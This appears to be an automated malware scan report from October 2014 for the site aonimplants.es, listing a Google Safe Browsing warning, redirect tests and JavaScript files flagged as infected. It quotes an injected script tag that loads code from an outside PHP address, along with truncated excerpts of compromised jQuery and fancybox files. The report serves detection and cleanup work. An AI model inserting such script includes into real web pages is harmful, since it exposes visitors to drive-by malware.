Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aonimplants.es
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://aonimplants.es/ | 200 OK Content-Length: 3049 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.lifeproject.it/RVA3S3f8.php?id=12116670"></script> | ||
http://aonimplants.es/js/jquery-1.6.2.min.js | 200 OK Content-Length: 97911 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cv(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cs(a){if(!cg[a]){var b=c.body,d=f("<" a ">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ch||(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendChild(ch);if(!ci||!ch.createElement)ci=(ch.contentWindow||ch.contentDocument).document,ci.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"") "<html><body>"),ci.close();d=c /*/a9a007*/ Antivirus reports:
| ||
http://aonimplants.es/./fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 7643 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d){function g(a){var b=a||window.event,i=[].slice.call(arguments,1),c=0,h=0,e=0;a=d.event.fix(b);a.type="mousewheel";if(a.wheelDelta)c=a.wheelDelta/120;if(a.detail)c=-a.detail/3;e=c;if(b.axis!==undefined&&b.axis===b.HORIZONTAL_AXIS){e=0;h=-1*c}if(b.wheelDeltaY!==undefined)e=b.wheelDeltaY/120;if(b.wheelDeltaX!==undefined)h=-1*b.wheelDeltaX/120;i.unshift(a,c,h,e);return d.event.handle.apply(this,i)}var f=["DOMMouseScroll","mousewheel"];d.event.special.mousewheel={setup:function() 39810*/ Antivirus reports:
| ||
http://aonimplants.es/./fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15353 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide();v.onerror=v.onload=null;G&&G.abort();m.empty()},O=function(){if(false===e.onError(o,q,e)){t.hide();h=false}else{e.titleShow=false;e.width="auto";e.height="auto";m.html('<p id 39810*/ Antivirus reports:
| ||
http://eu.ntrsupport.com/inquiero/web/an/ann4.asp?login=I23E9F50DC6B61A9E700343&lang=es&oper=master&hd=3 | 200 OK Content-Length: 3772 Content-Type: text/html | clean |
http://eu.ntrsupport.com/test404page.js | 404 Page not found Content-Length: 1547 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aonimplants.es
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 10 Oct 2014 05:18:27 GMT
Accept-Ranges: bytes
ETag: "681151-be9-4f4c805df4f00"
Server: Apache
Content-Length: 3049
Content-Type: text/html; charset=UTF-8
Last-Modified: Mon, 17 Mar 2014 07:03:56 GMT
...3049 bytes of data.
GET / HTTP/1.1
Host: aonimplants.es
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 10 Oct 2014 05:18:27 GMT
Accept-Ranges: bytes
ETag: "681151-be9-4f4c805df4f00"
Server: Apache
Content-Length: 3049
Content-Type: text/html; charset=UTF-8
Last-Modified: Mon, 17 Mar 2014 07:03:56 GMT
...3049 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aonimplants.es
Referer: http://www.google.com/search?q=aonimplants.es
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aonimplants.es
Referer: http://www.google.com/search?q=aonimplants.es
Result:
The result is similar to the first query. There are no suspicious redirects found.